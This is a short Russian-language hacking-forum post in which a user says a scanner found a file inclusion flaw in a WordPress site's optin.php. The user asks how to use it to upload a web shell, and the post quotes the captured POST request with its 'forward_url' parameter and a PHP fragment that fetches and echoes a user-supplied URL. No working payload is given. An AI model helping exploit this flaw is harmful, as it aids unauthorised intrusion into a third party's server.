Тема: File inclusion
Показать сообщение отдельно

  #1  
Старый 04.01.2022, 00:37
hashfinderboss
Новичок
Регистрация: 31.01.2020
Сообщений: 11
Провел на форуме:
2992

Репутация: 0
По умолчанию

Окунь нашел File inclusion,через эту уязвимость можно залить шел?

как это можно сделать на данном примере?помогите разобраться

POST /optin.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Cookie: _icl_current_language=en;wordpress_test_cookie=WP+ Cookie+check;wp-settings-0=+;wp-settings-time-0=+;wp-postpass_92fbf3142039a9350f471c96df=%24P%24BsFL3O3 mDUQjco83mZ%2FRu%2Fc4mUhjj0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate

Content-Length: 112

Host: сайт.ком

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Connection: Keep-alive

26241823=289&OptinFormID=5&UEmail=sample%40email.t st&field32=yes&field34=0&field6=GRLpGpAG&forward_u rl=optin.php

--------------------------------------------

array(

'method' => 'POST',

'content' => http_build_query($_POST)

)

);

$ctx = stream_context_create($params);

$fp = @fopen($url, 'rb', false, $ctx);

if ($fp) {

echo @stream_get_contents($fp);

die();

}

}

header('Location: https://******.**');

die();
 
Ответить с цитированием